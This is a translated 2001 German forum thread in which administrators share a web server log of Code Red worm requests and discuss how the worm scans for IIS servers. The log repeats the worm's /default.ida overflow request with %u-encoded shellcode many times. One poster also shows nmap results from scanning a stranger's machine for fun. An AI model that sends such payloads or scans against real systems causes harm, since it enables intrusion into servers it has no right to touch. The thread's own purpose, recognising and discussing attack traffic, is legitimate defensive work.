
Topic: Code Red sends its regards ---- Quite a lot going on!

  1. #1
    Communicator
    Registered since
    Apr 1999
    Location
    Reutlingen
    Posts
    3,673

    Code Red sends its regards ---- Quite a lot going on!

    Here is an excerpt from a log file:

    -------------------------
    www.tirs.cz - - [05/Aug/2001:15:00:14 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    212.184.72.8 - - [05/Aug/2001:15:08:11 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.tirs.cz - - [05/Aug/2001:15:15:39 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    pd90541d0.dip.t-dialin.net - - [05/Aug/2001:15:16:59 +0200] "-" 408 - "-" "-"
    pd90541d0.dip.t-dialin.net - - [05/Aug/2001:15:17:00 +0200] "-" 408 - "-" "-"
    212.224.137.162 - - [05/Aug/2001:15:20:10 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    cm61-18-7-132.hkcable.com.hk - - [05/Aug/2001:15:28:11 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 400 252 "-" "-"
    pd4b9f032.dip.t-dialin.net - - [05/Aug/2001:15:36:34 +0200] "GET / HTTP/1.1" 200 1 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
    212.71.101.33 - - [05/Aug/2001:15:44:23 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    chello212186059084.12.vie.surfer.at - - [05/Aug/2001:15:45:06 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    212.99.133.177 - - [05/Aug/2001:15:54:20 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    srv-ze-robot1.tricus.com - - [05/Aug/2001:15:58:00 +0200] "GET /robots.txt HTTP/1.0" 404 204 "-" "AbachoBOT"
    srv-ze-robot1.tricus.com - - [05/Aug/2001:15:58:00 +0200] "GET /inte/inter.htm HTTP/1.0" 404 208 "-" "AbachoBOT"
    212.234.66.100 - - [05/Aug/2001:15:59:40 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    212.68.198.216.brutele.be - - [05/Aug/2001:16:09:13 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    tnt-14-150.easynet.co.uk - - [05/Aug/2001:16:11:45 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    ezspider402.directhit.com - - [05/Aug/2001:16:23:35 +0200] "HEAD / HTTP/1.0" 200 0 "-" "Mozilla/2.0 (compatible; Ask Jeeves)"
    ezspider402.directhit.com - - [05/Aug/2001:16:23:36 +0200] "GET / HTTP/1.0" 200 1 "-" "Mozilla/2.0 (compatible; Ask Jeeves)"
    pd9568b07.dip.t-dialin.net - - [05/Aug/2001:16:29:37 +0200] "GET /uebe/webprov.htm HTTP/1.1" 404 222 "http://search.msn.de/results.asp?cfg=SMCINITIAL&srch=5&FORM=AS5&RS=CHEC KED&v=1&q=cuseemee" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" www.edu.nsu.ru - - [05/Aug/2001:16:30:15 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:16:31:50 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    cache-fra-aa05.proxy.aol.com - - [05/Aug/2001:16:46:11 +0200] "GET / HTTP/1.0" 200 1 "-" "Mozilla/4.0 (compatible; MSIE 5.5; AOL 5.0; Windows 98; DT)"
    stgt-3e362069.pool.mediaways.net - - [05/Aug/2001:16:56:39 +0200] "GET / HTTP/1.1" 200 1 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
    dialin-port8756.access.nacamar.de - - [05/Aug/2001:16:59:51 +0200] "GET / HTTP/1.1" 200 1 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
    soundundvision.net - - [05/Aug/2001:17:05:50 +0200] "HEAD / HTTP/1.0" 200 0 "-" "LWP::Simple/5.10"
    soundundvision.net - - [05/Aug/2001:17:05:51 +0200] "GET / HTTP/1.0" 200 1 "-" "LWP::Simple/5.10"
    soundundvision.net - - [05/Aug/2001:17:06:08 +0200] "HEAD / HTTP/1.0" 200 0 "-" "LWP::Simple/5.10"
    soundundvision.net - - [05/Aug/2001:17:06:09 +0200] "GET / HTTP/1.0" 200 1 "-" "LWP::Simple/5.10"
    subs.mun.yahoo.com - - [05/Aug/2001:17:08:46 +0200] "GET / HTTP/1.0" 200 1 "-" "Mozilla/4.05"
    212.27.113.99 - - [05/Aug/2001:17:12:29 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    j100.inktomi.com - - [05/Aug/2001:17:13:06 +0200] "GET /robots.txt HTTP/1.0" 404 204 "-" "Slurp/si (slurp@inktomi.com; http://www.inktomi.com/slurp.html)"
    212.71.98.35 - - [05/Aug/2001:17:13:09 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    j100.inktomi.com - - [05/Aug/2001:17:13:09 +0200] "GET / HTTP/1.0" 200 1 "-" "Slurp/si (slurp@inktomi.com; http://www.inktomi.com/slurp.html)"
    chello212017084052.12.vie.surfer.at - - [05/Aug/2001:17:13:56 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    p3ee0758b.dip.t-dialin.net - - [05/Aug/2001:17:28:38 +0200] "GET / HTTP/1.1" 200 1 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; T-Online Internatinal AG)"
    212.71.150.10 - - [05/Aug/2001:17:28:40 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:37:39 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:37:43 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:37:47 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:37:48 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:37:48 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:01 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:01 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:37 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:37 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:37 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:52 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:40:01 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% 
u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    212.251.120.124 - - [05/Aug/2001:17:41:37 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    -----------------------------------------

    Regards

    Eicke

  2. #2
    Registered user
    Registered since
    Jan 2000
    Location
    Munich
    Posts
    784


  3. #3
    Registered user
    Registered since
    Jul 2000
    Location
    Austria
    Posts
    1,866

    What does this Code Red actually do?

  4. #4
    Registered user Avatar of Ulli Ivens
    Registered since
    Jan 2001
    Location
    Heinsberg in the Rhineland, Germany
    Posts
    1,844

    Uhm, wait a moment .....

    You surely have a Linux server ---- I thought the thing only infects NT and 2000 ??? Or is it sooo dumb that it also tries to infect Linux machines ??? And what are the excerpts (that is, what do they mean) ??

    Excuse my ignorance !!

    [ 06 August 2001: Post edited by: Ulli Ivens ]
    Regards, Ulli

    ---------
    Notebook: MacBookPro | Late 2012, 16 GB RAM | Software: Mac OS X 10.8.2 | Parallels with Ubuntu 12.4 with XFCE and Windows 8 | NetAachen DSL 6000, FritzBox Fon 7270 | several DD-WRT APs

  5. #5
    Registered user
    Registered since
    Oct 1999
    Location
    Kiel
    Posts
    1,798

    Hi

    Similar entries are showing up in my log file too.

    It is correct that Code Red can only infect Microsoft services.
    But to find them, all possible IPs are scanned systematically and randomly in the hope of finding an IIS. In the process packets are of course also sent to Linux servers, but these are normally filtered by the firewall.

    If port 80 is open on your machine, then your machine answers. But as far as I know there are no Linux mutations of the virus.

    Regards
    christoph

  6. #6
    Communicator
    Registered since
    Apr 1999
    Location
    Reutlingen
    Posts
    3,673

    Hello,

    the log file above comes from a WIN2000 server.

    The virus practically tries the servers one after another to find out whether the index server it wants to crack is running on the respective system.

    There the virus then nests itself and starts further attacks against other machines.

    Blocking port 80 with a firewall is not such a good idea for a web server.

    Of course the forum runs on a Linux server.

    Regards

    Eicke

  7. #7
    Registered user
    Registered since
    Oct 1999
    Location
    Kiel
    Posts
    1,798

    Hi

    Sure, if the server is a web server then port 80 of course cannot be closed.
    But there are many people on the net with many open ports.

    For fun I scanned one such machine.
    I am not an NT admin, but do so many open ports really have to be there on a web server?

    <pre>
    Port State Service
    80/tcp open http
    111/tcp filtered sunrpc
    135/tcp open loc-srv
    137/tcp filtered netbios-ns
    138/tcp filtered netbios-dgm
    139/tcp filtered netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open listen
    1026/tcp open nterm
    2301/tcp open compaqdiag
    3389/tcp open msrdp
    5000/tcp open fics
    </pre>

    I got the 3 requests from that server

    For comparison, here is an Apache

    <pre>
    21/tcp open ftp
    25/tcp filtered smtp
    80/tcp open http
    111/tcp filtered sunrpc
    136/tcp filtered profile
    137/tcp filtered netbios-ns
    138/tcp filtered netbios-dgm
    139/tcp filtered netbios-ssn
    443/tcp open https
    512/tcp open exec
    8080/tcp open http-proxy
    </pre>

    Regards
    christoph

  8. #8
    Registered user
    Registered since
    Jun 1999
    Posts
    629

    Hello christoph,

    I'm not a network pro, but those ports are not Apache's, they are simply a server's -- ftp and http-proxy are not ports that Apache opens!

